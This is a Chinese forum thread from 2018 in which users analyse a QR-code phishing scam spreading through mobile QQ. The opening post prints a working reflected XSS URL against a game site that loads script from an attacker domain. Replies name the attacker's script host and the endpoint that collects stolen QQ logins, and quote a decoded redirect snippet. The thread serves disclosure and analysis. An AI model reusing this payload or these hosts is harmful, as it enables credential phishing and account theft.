V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
工单节点使用指南
• 请用平和的语言准确描述你所遇到的问题
• 厂商的技术支持和你一样也是有喜怒哀乐的普通人类,尊重是相互的
• 如果是关于 V2EX 本身的问题反馈,请使用 反馈 节点
yejinmo
V2EX  ›  全球工单系统

有没有腾讯的人啊。。好像出了个新漏洞???

  •  
  •   yejinmo · 2018-08-08 21:46:10 +08:00 · 8740 次点击
    这是一个创建于 2305 天前的主题,其中的信息可能已经有所发展或是发生改变。

    朋友自动发给我的,说是前不久他朋友发给他的,通过 QQ 传播的,需要在手机 QQ 上扫码

    二维码解析后的恶意链接

    http://comment.ali213.net/ali-comment-renotice.php?callback=%00%00%00%00%00%00%00%3CscripT/src=//633832.pywbm.cn/template/app.js%3E%3C/scripT%3E%3C!--
    

    其中指向的恶意代码

    http://633832.pywbm.cn/template/app.js
    

    鹅厂员工调查下为啥会自动发给好友?

    有没有搞安全的大佬研究下?

    第 1 条附言  ·  2018-08-09 09:55:43 +08:00
    游侠网没做防 XSS 注入

    手机 QQ 内置浏览器没做 XSS 注入检测
    41 条回复    2018-08-10 10:20:15 +08:00
    yejinmo
        1
    yejinmo  
    OP
       2018-08-08 21:47:31 +08:00
    恶意图片:

    tangweihua163
        2
    tangweihua163  
       2018-08-08 22:39:18 +08:00
    屁大点事儿,又不是山( shan )洞( dong )佃( dian )妇( fu )
    xmdhs
        3
    xmdhs  
       2018-08-08 22:48:37 +08:00 via iPad
    大概是他没看域名就输了密码吧

    1024MB
        4
    1024MB  
       2018-08-08 22:56:01 +08:00 via Android
    这是人的漏洞,安全领域叫社会工程学,凯文叫它欺骗的艺术。so,你被骗了,叫警察的漏洞
    e1el
        5
    e1el  
       2018-08-08 22:59:33 +08:00
    这不叫漏洞,这叫
    ![]( )
    lzxgh621
        6
    lzxgh621  
       2018-08-08 23:04:51 +08:00
    @e1el 不要在论坛发漩涡好吗。。。吓死了
    yiqiao
        7
    yiqiao  
       2018-08-08 23:07:36 +08:00
    @e1el 心理阴影
    Lentin
        8
    Lentin  
       2018-08-08 23:22:25 +08:00   ❤️ 1
    这个应该是属于 @游侠网 ali213.net 的一个 XSS 漏洞,跟腾讯关系不大
    Lentin
        9
    Lentin  
       2018-08-08 23:25:24 +08:00   ❤️ 1
    https://bbs.ichunqiu.com/thread-43894-1-1.html
    其实腾讯也有锅,没有主动 XSS 探测,Chrome 很机智的检测出来了
    34C
        10
    34C  
       2018-08-09 02:44:07 +08:00
    我想说那个二维码做得蛮好看的…… 有谁知道在哪生成的吗……
    sdshdv
        11
    sdshdv  
       2018-08-09 03:22:25 +08:00 via Android
    这种老骗术也就刚刚用 QQ 的小学生会上当
    qiayue
        12
    qiayue  
       2018-08-09 07:01:29 +08:00   ❤️ 1
    最后网页会把假的登录框得到的账号和密码传输到 http://qzone.duboy.com.cn/user.php
    之后跳转到 http://yunzhijia.com/microblog/filesvr/5b365ddd364a0f55c8d16590,给你看狗
    AlisaDestiny
        13
    AlisaDestiny  
       2018-08-09 07:46:06 +08:00   ❤️ 1
    被插入的 js 地址:
    ```
    http://qqq.brhrc.cn/template/login.js
    ```
    ![]( https://i.loli.net/2018/08/09/5b6b7ffdeb69b.png)
    由于页面代码使用的 base64 编码和 arc4 加密,这是最终解码出来的页面代码:
    ```
    https://paste.ubuntu.com/p/y98DWVZYMg/
    ```
    这是账号提交的地址:
    ![]( https://i.loli.net/2018/08/09/5b6b80708e653.png)

    我能做的就是这么多了。各位如何对待这个服务器请随意。
    yamedie
        14
    yamedie  
       2018-08-09 07:49:34 +08:00 via Android   ❤️ 1
    @34C 联图 liantu.com
    jiqing
        15
    jiqing  
       2018-08-09 08:05:41 +08:00
    @AlisaDestiny #12 兄弟你这怎么解码出来的
    opengps
        16
    opengps  
       2018-08-09 08:07:17 +08:00
    这是个老骗术,就是仿站,钓鱼拿到账号密码,你随便输入点他都会记录
    yejinmo
        17
    yejinmo  
    OP
       2018-08-09 09:21:06 +08:00
    @xmdhs #3
    @Lentin #8
    @Lentin #9
    @sdshdv #11

    腾讯的确是有很多服务要求你用手机 QQ 扫码登录之类的,只不过这个扫了码之后要求输入账号密码就很假了

    想说手机 QQ 内置浏览器为什么没有 XSS 检测。。
    yejinmo
        18
    yejinmo  
    OP
       2018-08-09 09:22:57 +08:00
    @opengps #16

    刚开始以为是以前分享攻击之类的,后来问清朋友是主动输入的账号密码被钓了
    yejinmo
        19
    yejinmo  
    OP
       2018-08-09 09:28:46 +08:00
    @34C #10

    好像是作者自己弄的。。谷歌了一遍没找到相似图片
    CokeMine
        20
    CokeMine  
       2018-08-09 09:43:12 +08:00 via Android
    虚假登录界面

    同二维码 以前差点中过招,还好最后回过神来了
    我的好友好几个都被盗给我发一模一样的 zz 二维码了
    crazygod
        21
    crazygod  
       2018-08-09 09:58:34 +08:00
    钓鱼网站,最简单的破解方法就是看网址。。。官方一般不会有杂七杂八的前缀和后缀
    faceRollingKB
        22
    faceRollingKB  
       2018-08-09 10:05:07 +08:00
    人可以做得更多,看域名看证书
    浏览器也可以做得更多,做一些常见的问题检测
    yejinmo
        23
    yejinmo  
    OP
       2018-08-09 10:19:47 +08:00
    @crazygod #21

    手机 QQ 扫了码之后没地方看网址。。只能是解了二维码之后在电脑上看
    licoycn
        24
    licoycn  
       2018-08-09 10:22:30 +08:00
    很明显钓鱼网站
    kfteast
        25
    kfteast  
       2018-08-09 11:45:53 +08:00   ❤️ 1
    @34C 貌似有个叫第九工场的网站 一部分是免费制作 绝大部分是收费的
    tutustream
        26
    tutustream  
       2018-08-09 11:57:39 +08:00   ❤️ 1
    @34C #10
    @kfteast #25

    联图网-二维码美化-吃豆人主题

    其实我想说的是,这些美化过的手机扫可能会失败的。
    C860
        27
    C860  
       2018-08-09 14:16:30 +08:00   ❤️ 2
    是游侠网的同学修复了?我现在看到的结果是:

    fuck_your_mama({"status":"0","msg":"0"})
    yejinmo
        28
    yejinmo  
    OP
       2018-08-09 14:19:46 +08:00
    @C860 #27

    游侠网这么有意思嘛
    tetsai
        29
    tetsai  
       2018-08-09 14:22:14 +08:00   ❤️ 1
    @C860 #27 +1,英文加拼音,讲究
    houzhishi
        30
    houzhishi  
       2018-08-09 14:37:03 +08:00
    @tetsai 的确挺讲究的。
    8qwe24657913
        31
    8qwe24657913  
       2018-08-09 15:03:21 +08:00
    @AlisaDestiny #13 那个 pastebin 上代码第 47 行还是混淆过的,解码出来是
    var system={win:false,mac:false,xll:false};var p=navigator.platform;system.win=p.indexOf("Win")==0;system.mac=p.indexOf("Mac")==0;system.x11=(p=="X11")||(p.indexOf("Linux")==0);if(system.win||system.mac||system.xll){window.location.href="http://pvp.qq.com/m/"}
    如果系统是 win / mac / linux,跳到王者荣耀官网,摆明了是准备只坑手机……

    再就是点击登录后跳转的图片
    ![]( http://yunzhijia.com/microblog/filesvr/5b365ddd364a0f55c8d16590)
    这表情嘲讽意义很浓啊
    lneoi
        32
    lneoi  
       2018-08-09 15:17:49 +08:00
    23333 这个返回
    TOTT
        33
    TOTT  
       2018-08-09 15:34:07 +08:00
    楼主头像大图有没有,或者高清的
    bpllzbh
        34
    bpllzbh  
       2018-08-09 16:20:14 +08:00
    ```
    [markdown-test]( https://www.google.com.au/)
    ```
    yejinmo
        35
    yejinmo  
    OP
       2018-08-09 16:30:57 +08:00
    @bpllzbh #34

    测试失败
    x7395759
        37
    x7395759  
       2018-08-09 18:44:08 +08:00
    腾讯曾经 5 块钱一个网站漏洞哈哈哈
    input2output
        38
    input2output  
       2018-08-09 19:10:51 +08:00
    类似这种 XSS 见过好几次了
    pyufftj
        39
    pyufftj  
       2018-08-10 09:30:43 +08:00
    @x7395759 什么梗。
    colouryin
        40
    colouryin  
       2018-08-10 10:19:17 +08:00
    我也有同学给我发……手机 QQ 点链接要手动输密码,用浏览器打开能用快捷登录调用 QQ 登录,然后会跳转到 QQ 空间……
    yejinmo
        41
    yejinmo  
    OP
       2018-08-10 10:20:15 +08:00
    @colouryin #40

    这么智能的么😂
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1531 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 28ms · UTC 17:08 · PVG 01:08 · LAX 09:08 · JFK 12:08
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.